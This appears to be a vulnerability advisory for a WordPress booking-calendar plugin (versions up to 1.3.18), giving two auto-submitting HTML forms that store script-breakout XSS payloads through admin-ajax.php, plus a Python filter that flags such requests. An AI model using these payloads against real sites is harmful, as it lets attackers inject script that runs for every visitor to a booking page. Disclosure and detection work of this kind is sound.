Appointment Booking Calendar <= 1.3.18 – Unauthenticated Stored XSS

Plugin slug: appointment-booking-calendar
<body onload="document.forms[0].submit();">
  <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="CP_ABC_post_edition" value=""/>
    <input type="hidden" name="cfwpp_edit" value="js"/>
    <input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/>
  </form>
</body>

<body onload="document.forms[0].submit();">
  <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="CP_ABC_post_edition" value=""/>
    <input type="hidden" name="cfwpp_edit" value="css"/>
    <input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/>
  </form>
</body>

The payload will be triggered on all pages with a booking form.
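Added example, not part of the original advisory or the plugin's code: a request filter a defender could run in front of a site still on an affected version, flagging requests shaped like the two forms above. The function name, the finding strings and the login-cookie heuristic are assumptions made for this sketch.

```python
import re
from urllib.parse import parse_qs, urlencode

# Parameter names and endpoint are the ones used by the PoC forms above.
ENDPOINT = "/wp-admin/admin-ajax.php"
MARKER, MODE, CONTENT = "CP_ABC_post_edition", "cfwpp_edit", "editionarea"

# A closing tag for the enclosing block lets stored text escape into HTML.
BREAKOUT = {
    "js": re.compile(r"<\s*/\s*script", re.I),
    "css": re.compile(r"<\s*/\s*style", re.I),
}

def classify(method, path, body, cookie_header=""):
    """Return findings for one request; an empty list means nothing matched."""
    if method.upper() != "POST" or not path.split("?")[0].endswith(ENDPOINT):
        return []
    # keep_blank_values matters: the PoC sends the marker with an empty
    # value, which parse_qs drops by default.
    params = parse_qs(body, keep_blank_values=True)
    if MARKER not in params:
        return []
    findings = []
    # Assumption: a wordpress_logged_in_* cookie is only a hint that the
    # sender has a session; it is not validated here.
    if "wordpress_logged_in_" not in cookie_header:
        findings.append("edit request without login cookie")
    mode = params.get(MODE, [""])[0].lower()
    content = "\n".join(params.get(CONTENT, []))
    pattern = BREAKOUT.get(mode)
    if pattern and pattern.search(content):
        findings.append(f"closing tag in {mode} field")
    return findings

# Constructed sample requests (bodies built here, not captured traffic).
POC_JS = urlencode({MARKER: "", MODE: "js",
                    CONTENT: "</script><svg/onload=alert(/XSS-JS/)>"})
ADMIN_CSS = urlencode({MARKER: "", MODE: "css", CONTENT: ".abc{color:red}"})

if __name__ == "__main__":
    print(classify("POST", ENDPOINT, POC_JS))
    print(classify("POST", ENDPOINT, ADMIN_CSS,
                   "wordpress_logged_in_0000=constructed"))
```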
